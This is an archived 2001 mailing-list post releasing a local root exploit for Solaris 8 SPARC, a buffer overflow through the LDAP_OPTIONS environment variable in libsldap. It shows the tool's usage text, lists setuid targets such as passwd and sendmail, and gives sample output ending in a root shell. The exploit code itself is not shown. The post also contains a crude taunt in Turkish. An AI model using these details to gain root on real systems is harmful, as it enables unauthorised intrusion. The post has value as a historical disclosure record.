Hi, I wish to free this one since it has been made public by some ppl. libsldap hole has been known for long. As far as I know, swayat_private did actually found the hole several months ago and generously let me know about it. All propz goes to him. Thanks bro. Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with success. I usually support the anti-sec movement but I got my reasons to publish the exploit. If you want to know why, please do mail me. $ ./libsldap-exp libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow Exploit code: noirat_private Bug discovery: swayat_private Usage: ./libsldap-exp target# target#: 0, /usr/bin/passwd Solaris8, Sparc64 target#: 1, /usr/bin/nispasswd Solaris8, Sparc64 target#: 2, /usr/bin/yppasswd Solaris8, Sparc64 target#: 3, /usr/bin/chkey Solaris8, Sparc64 target#: 4, /usr/lib/sendmail Solaris8, Sparc64 $ ./libsldap-exp 0 # id uid=0(root) gid=0(root) # PS: t(L)amer sahin kicina oyle bir tekme yiyeceksinki, agzindan cikicak. Haberin olsun istedim : ) Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos cheers, noir
This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 11:00:20 PDT